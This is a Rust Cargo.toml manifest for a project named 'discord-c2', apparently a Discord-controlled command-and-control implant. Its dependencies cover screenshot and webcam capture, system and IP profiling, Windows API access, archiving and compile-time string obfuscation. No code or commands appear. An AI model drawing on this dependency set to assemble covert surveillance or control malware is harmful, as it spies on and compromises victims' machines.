[package]
name = "discord-c2"
version = "0.0.1"
edition = "2021"

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
anyhow = "1.0.70"
ansi_term = "0.12.1"
chrono = "0.4.24"
futures = "0.3.28"
image = "0.25.1"
jpeg-decoder = "0.3.0"
lazy_static = "1.4.0"
public-ip-addr = "0.1" # make my own for this
reqwest = "0.12.4"
regex = "1.8.1"
serde_json = "1.0.96"
screenshots = "0.8.10"
tempfile = "3.5.0"
tracing = "0.1.37"
tracing-subscriber = { version = "0.3.18", features = ["env-filter"] }
winapi = "0.3.9"
zip = "1.3.1"
sysinfo = "0.30.12"
poise = "0.6.1"
litcrypt2 = "0.1.2"
once_cell = "1.19.0"
tokio-util = { version = "0.7.11", features = ["codec"] }

[dependencies.nokhwa]
version = "0.10.3"
features = ["input-native", "output-threaded"]

[dependencies.serde]
version = "1.0.163"
features = ["derive"]

[dependencies.tokio]
version = "1.28.1"
features = ["full"]

[dependencies.uuid]
version = "1.3.2"
features = ["v4"]

[profile.dev]
opt-level = 0
debug = true
lto = "off"
panic = "unwind"
incremental = true

[profile.release]
opt-level = "z"
debug = false
strip = "debuginfo"
debug-assertions = false
overflow-checks = false
lto = true
panic = "abort"
codegen-units = 1
